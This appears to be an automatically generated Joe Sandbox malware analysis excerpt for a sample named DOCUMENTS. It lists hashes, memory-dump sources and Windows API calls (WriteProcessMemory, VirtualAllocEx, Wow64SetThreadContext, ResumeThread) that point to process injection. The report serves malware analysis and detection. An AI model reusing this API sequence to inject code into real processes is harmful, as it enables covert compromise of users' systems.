                                                • Opcode ID: ebb3ad1be653b8204d23e829df195f6313077c2c8d682fac5f5e8a9d523022fe
                                                • Instruction ID: 35ff3d1c75b0ad4055d0fe009ca2db270c0d0a49d49cdd8faa3a1b56939eaaa1
                                                • Opcode Fuzzy Hash: ebb3ad1be653b8204d23e829df195f6313077c2c8d682fac5f5e8a9d523022fe
                                                • Instruction Fuzzy Hash: A12168B190030A9FDB10DFA9C8817DEBBF1FF48310F14882AE959A7241D7789941CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 70deff8 (calls WriteProcessMemory); graph rendering not reproduced
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070DF088
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 7c2b5cc0b295c1c1fc3f409601be713cb94590761e62189833ffb3cc8dca7919
                                                • Instruction ID: d88f65c5c96101b4c15367d58842f06641b9fa8904e62506ddeae1ad80156506
                                                • Opcode Fuzzy Hash: 7c2b5cc0b295c1c1fc3f409601be713cb94590761e62189833ffb3cc8dca7919
                                                • Instruction Fuzzy Hash: 982127B19003599FDB10DFAAC881BDEBBF5FF48310F108929E919A7240D779A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 70dee58 (calls Wow64SetThreadContext); graph rendering not reproduced
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070DEEDE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 0b53fc6b634976279b3fe412f10501a6a05d15fa0239f13042a6a036d72de845
                                                • Instruction ID: 1cecec9b8b0f1be7f5db4736e7293b1efe434d4ea3fd61d66ef8a78fc33da763
                                                • Opcode Fuzzy Hash: 0b53fc6b634976279b3fe412f10501a6a05d15fa0239f13042a6a036d72de845
                                                • Instruction Fuzzy Hash: 202138B1D003198FDB60CFAAC4857EEBBF4EF48324F14892AD459A7240CB799945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 70df0e0 (calls ReadProcessMemory); graph rendering not reproduced
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070DF168
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: dfa172ebc1b17db23784875fce1d38fa078d24750b3de46c7a2ec0a52e59256d
                                                • Instruction ID: c08ab0129638b128210d4f0c9ae619350d6f87a1e8921025e2f5ae143eb91e6f
                                                • Opcode Fuzzy Hash: dfa172ebc1b17db23784875fce1d38fa078d24750b3de46c7a2ec0a52e59256d
                                                • Instruction Fuzzy Hash: AA2107B5D003599FDB10DFA9C981BEEBBF5FF48310F10882AE559A7240D7389945CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 70df0e8 (calls ReadProcessMemory); graph rendering not reproduced
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070DF168
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 45eebc4ba14977d43bd79e1c3ec6fae712069db4dad232c2178ff2313cb1faad
                                                • Instruction ID: 0b262399643627ced79f109ac38326c5a882c811370964be82708b29cfbc7ec7
                                                • Opcode Fuzzy Hash: 45eebc4ba14977d43bd79e1c3ec6fae712069db4dad232c2178ff2313cb1faad
                                                • Instruction Fuzzy Hash: BB21E6B5D003599FDB10DFAAC881BDEBBF5FF48320F108929E519A7240D779A945CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 70dee60 (calls Wow64SetThreadContext); graph rendering not reproduced
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070DEEDE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 112c02e866b0b1d38eaaaaad197917a8fea4c5cbc943f7a60f3f13e45b1adece
                                                • Instruction ID: 3d0be229418524f762c6bf6b7261d404aa4922e56cf6a58d12a61c64fbace29a
                                                • Opcode Fuzzy Hash: 112c02e866b0b1d38eaaaaad197917a8fea4c5cbc943f7a60f3f13e45b1adece
                                                • Instruction Fuzzy Hash: 852129B1D003198FDB10DFAAC4857EEBBF5EF48324F148529D419A7240DB78A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 11bd5c0 (calls DuplicateHandle); graph rendering not reproduced
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011BD647
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 6ba77dd72e71a8defe6169c6ed13546de732b251dd7cbacc422759eb7ee4714f
                                                • Instruction ID: a86cc334bbdac2c3b863427e1adf4d99fa84deebd21cb4f933df5fa9afc18815
                                                • Opcode Fuzzy Hash: 6ba77dd72e71a8defe6169c6ed13546de732b251dd7cbacc422759eb7ee4714f
                                                • Instruction Fuzzy Hash: E921C4B59002489FDB10CF9AD984ADEFBF5EB48314F14841AE918A3350D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 70def30 (calls VirtualAllocEx); graph rendering not reproduced
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070DEFA6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 1faf161845ee6343d523e23ac8a8b772bacd5155256674700604e156ef565de9
                                                • Instruction ID: 84ce4e3caabce2bf3e69896afe7623da606e2d1bb70b2268ad1dc65771853c5e
                                                • Opcode Fuzzy Hash: 1faf161845ee6343d523e23ac8a8b772bacd5155256674700604e156ef565de9
                                                • Instruction Fuzzy Hash: 911159758003499FDB20DFA9C844BDEFBF5EF48320F248819E559A7250C7799941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 11ba0a8 (calls LoadLibraryExW); graph rendering not reproduced
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BAFB9,00000800,00000000,00000000), ref: 011BB1CA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 596c52114acd6f9f7ea2c6c747a4868859a9e81701c640af0d3a6dc45dc7f57c
                                                • Instruction ID: 013eaea57e5f4130c37f8e2ffb3bfb1384c54f0ff81ebf98a84979f4f5654630
                                                • Opcode Fuzzy Hash: 596c52114acd6f9f7ea2c6c747a4868859a9e81701c640af0d3a6dc45dc7f57c
                                                • Instruction Fuzzy Hash: B311F9B5D043499FDB14CF9AD884BDEFBF4EB48310F10841AE519A7600C775A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BAFB9,00000800,00000000,00000000), ref: 011BB1CA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 0574f302373efe3bc771adb7c709fe2a38d0a41c34d7a61bb3d6518da88f61f5
                                                • Instruction ID: 9516f0b3fc2a9f3ffea8a85897fef622a173b9c42eaef314e969183fa85ef61f
                                                • Opcode Fuzzy Hash: 0574f302373efe3bc771adb7c709fe2a38d0a41c34d7a61bb3d6518da88f61f5
                                                • Instruction Fuzzy Hash: 9B1114B68002498FDB14CFAAD884BDEFBF4EB88310F10842AD919A7610C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070DEFA6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 6bbdc9171ba3c7deb192a38cf188d5b09f35a2fea1f71aa52b398bdec8807dad
                                                • Instruction ID: 16fcc87e384c824a140cb9c7223d99df3729a306a6734b1f2ca221b4675de5d3
                                                • Opcode Fuzzy Hash: 6bbdc9171ba3c7deb192a38cf188d5b09f35a2fea1f71aa52b398bdec8807dad
                                                • Instruction Fuzzy Hash: C211F6759003499FDB20DFAAC845BDFBBF5EF88320F148819E519A7250CB79A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 6d2716eab817d0961a8857e4cf5ad8c6621bd01cb7fb661b2e5ab926575bef2f
                                                • Instruction ID: 6accefc36ad80c0e2711ac309b1e78c41103479b4fd9bec59054eb0342b79f8b
                                                • Opcode Fuzzy Hash: 6d2716eab817d0961a8857e4cf5ad8c6621bd01cb7fb661b2e5ab926575bef2f
                                                • Instruction Fuzzy Hash: D51158B5D003598FDB20DFAAC4457EEFBF5EF48220F24891AD459A7240CB39A945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAF3E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4ced76f9d2989e797b7c7df128eb70ef595e17862bf3c918f0eaa22804fddf8a
                                                • Instruction ID: 3356cc9b85b09b950c158385f43b1010e23c6b587063a7052d1ffe11ee4e05c4
                                                • Opcode Fuzzy Hash: 4ced76f9d2989e797b7c7df128eb70ef595e17862bf3c918f0eaa22804fddf8a
                                                • Instruction Fuzzy Hash: C51146B1C002498FDB24CFAAD485BDEFBF1EF88314F14845AD459A7240C379A546CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 89d91c6affa3983aac3e1d2418737c76a3bc9e6e9bda2d546794959b1a577b29
                                                • Instruction ID: 70a937136efbefbb3f2f86875b3fba92b31ea65df2811b3cc996579d8b36c460
                                                • Opcode Fuzzy Hash: 89d91c6affa3983aac3e1d2418737c76a3bc9e6e9bda2d546794959b1a577b29
                                                • Instruction Fuzzy Hash: F61128B1D003598FDB20DFAAC4457DEFBF5EF88220F248819D419A7240CA79A941CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAF3E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6f54ecea5a0bfb3f678d025542841766077a389d831ab7a3b388a67be24e5f7d
                                                • Instruction ID: 4fec16e40df20988919ea264800da14e7f4143efa5d2c284d60e9952aca0e64c
                                                • Opcode Fuzzy Hash: 6f54ecea5a0bfb3f678d025542841766077a389d831ab7a3b388a67be24e5f7d
                                                • Instruction Fuzzy Hash: 9A110FB6C002498FDB24CF9AD484ADEFBF4EF88224F10841AD928A7240C379A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 071B3EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 4da6b0eda941f3bc82631fc1bf67f957b42b77f0173e2838c699532d30a57d41
                                                • Instruction ID: 727ae33cc687fa546a35da3b8409478901840ca77cb4151d2f52b520035c2c41
                                                • Opcode Fuzzy Hash: 4da6b0eda941f3bc82631fc1bf67f957b42b77f0173e2838c699532d30a57d41
                                                • Instruction Fuzzy Hash: 0E11E5B58003499FDB20DF9AC985BDEFBF8EB48320F10881AD518B7640D379A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 071B3EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 5424430a82105d1b81689c347842e01333ca8f26c6c52bc71de2b4c23e54146b
                                                • Instruction ID: da837e099abc2353395630f0c83112108bfb15e2151550a276739e0aea3601c3
                                                • Opcode Fuzzy Hash: 5424430a82105d1b81689c347842e01333ca8f26c6c52bc71de2b4c23e54146b
                                                • Instruction Fuzzy Hash: 8611C2B58003499FDB20DF99D985BDEBBF4EB48310F10881AD958B7640D379A594CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d278bb856a6cf22ff210725df06c3c7979eb39b46377c982486a9181fa8b582
                                                • Instruction ID: 11e2cfe11b8b4cc944ff4a5c0de5f505a1dfc3d82c3e35f6cafd03fa9cc7ae5b
                                                • Opcode Fuzzy Hash: 4d278bb856a6cf22ff210725df06c3c7979eb39b46377c982486a9181fa8b582
                                                • Instruction Fuzzy Hash: 00210371500304DFDB05DF10D9C0B16BB66FB99324F24C569E80A0B656C37AE856DAB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfdad58e56a3f95b8248b76602c3c86c654503cb8d812df735f21542bdcd7ce7
                                                • Instruction ID: 167fe9626e07605510ad220624429c1910525ca7c8457f4f1b7b2992d2fd2cef
                                                • Opcode Fuzzy Hash: dfdad58e56a3f95b8248b76602c3c86c654503cb8d812df735f21542bdcd7ce7
                                                • Instruction Fuzzy Hash: AA212572904240DFDB15DF10D9C0F26BF66FB8A318F24C569E84A0B656C336D856DBB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3dc5cc232ebbe7a2afb1e56b40ff1a3580ac9508ab32af354587dcb0bbee490f
                                                • Instruction ID: e7fe755c8cb6d67c6a442d0502227ba041cde1b41117a0cb1e9cdfdd756de48f
                                                • Opcode Fuzzy Hash: 3dc5cc232ebbe7a2afb1e56b40ff1a3580ac9508ab32af354587dcb0bbee490f
                                                • Instruction Fuzzy Hash: F8212271604300DFDB14EF10D8C0B56BB62EB88314F24C5A9E84A0B282D33AD847CA72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c82b61ea3adb457679925e6dfadef9366147799a49189f3b70a7692c0f18c8cd
                                                • Instruction ID: c26966075d9acf852ce28386a24a29151cf26ac9c7c61098e32c172fe1ef988f
                                                • Opcode Fuzzy Hash: c82b61ea3adb457679925e6dfadef9366147799a49189f3b70a7692c0f18c8cd
                                                • Instruction Fuzzy Hash: F621F271504384EFDB05DF10D9C0B66BBA6FB88314F24C5ADE84A4B292E33AD846CB75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 498b43a76fbc670a81b55669505d3b4f19f9e75056ad993cb0726f9a3436c389
                                                • Instruction ID: def203e4d2190e97144ff8375106e19c8c5f07ec69779dda7d51939d65d43739
                                                • Opcode Fuzzy Hash: 498b43a76fbc670a81b55669505d3b4f19f9e75056ad993cb0726f9a3436c389
                                                • Instruction Fuzzy Hash: 7C218E75509380CFCB06DF20D990715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 656cdf870b07bd275c6663ee573eaa112bc3be084676c256a2a62afffb15ec70
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 6B112676404240CFCB05CF00D5C4B16BF72FB99324F28C6A9D80A0B656C33AE856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: adf8df3b3521feb36c2e83a1a26531a0f3a64fc9ed5a4add7d47d3bde14ceefe
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 6311E676904280CFCB15CF10D5C4B1ABF72FB99314F28C6A9D84A0B656C336D856DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: 095c964384086106f3364afef665d479f995f91217112514d2bd3aa86629f875
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: BD118B75504280DFCB15DF10D5C4B55BFA2FB84314F28C6A9D84A4B696D33AD84ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 014d84a6cfc2cad134f6b776bee3f8791f25ecdf497155a7e0d8348b24cc07ac
                                                • Instruction ID: c72cf25c45716ad3fe3e85b827096c692b2e270973f1bce07bb47fea2844f6d5
                                                • Opcode Fuzzy Hash: 014d84a6cfc2cad134f6b776bee3f8791f25ecdf497155a7e0d8348b24cc07ac
                                                • Instruction Fuzzy Hash: 46012B310043409EE7248F15CC84B66FBA9DF42364F18C91AED1B0BA82D379DC41CAB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06e5ad1c8cbe13ed6a66fa9068467da3c466beb92b3d2a3232f05f21c502735c
                                                • Instruction ID: cd272c23e63d9d9afe6912fc5c6bd997087bfb87823673cb5e0e424f79d911de
                                                • Opcode Fuzzy Hash: 06e5ad1c8cbe13ed6a66fa9068467da3c466beb92b3d2a3232f05f21c502735c
                                                • Instruction Fuzzy Hash: F4F0F6314043449EE7248E15CCC4B62FF98EB52334F18C45AED0A0F696C2799C40CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T+-q$[V~*$]\`
                                                • API String ID: 0-3978741314
                                                • Opcode ID: 1c644455b18a91d8eba2057f5cea1fdbb936c87f06da0021a078b38e2e66bff1
                                                • Instruction ID: a081c88842c7e2ff623b843e0dbd2c1eb28bb60a4649257dfa096e532888a13c
                                                • Opcode Fuzzy Hash: 1c644455b18a91d8eba2057f5cea1fdbb936c87f06da0021a078b38e2e66bff1
                                                • Instruction Fuzzy Hash: 0AB1D6B0E157199F8B04CFEAD98099EFBF2BF89300F14D62AD819AB254D77099118F64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8053b71f4c84877e0c0cce8695d55de955424cb73aedb60200489ba8f3a814a8
                                                • Instruction ID: bbecfc465c6d7b8d7eab99cbfa14855f2c5e83bf1faa4301043a4a0f461ec397
                                                • Opcode Fuzzy Hash: 8053b71f4c84877e0c0cce8695d55de955424cb73aedb60200489ba8f3a814a8
                                                • Instruction Fuzzy Hash: CEE1C4B4E002198FDB14DFA9C580AAEFBF2FB89304F648269D454AB355D731AD42CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22f0b1526f36bc3497966b6ebd65567d64a691cbb32ad99bb1017b6d829a0e20
                                                • Instruction ID: 8ebd3f5e0263a983a516673bd248d0c2fe353b6049fd2e9f625419325af8253d
                                                • Opcode Fuzzy Hash: 22f0b1526f36bc3497966b6ebd65567d64a691cbb32ad99bb1017b6d829a0e20
                                                • Instruction Fuzzy Hash: DFE1D6B4E002198FDB14DFA9C580AAEBBF2FF89304F648269D454AB355D730AD42CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18a777d2c0123de6b2dd62c553b62112b13ef60233f8de1df83380a8ae10393c
                                                • Instruction ID: 9f4e54345c881af85f46d8cd36262ad5cc6000351ef1b4efeced068db63b5289
                                                • Opcode Fuzzy Hash: 18a777d2c0123de6b2dd62c553b62112b13ef60233f8de1df83380a8ae10393c
                                                • Instruction Fuzzy Hash: 48E1D7B4E002598FDB14DFA9C580AAEBBF2FF89304F248269D414AB355D731AD42CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
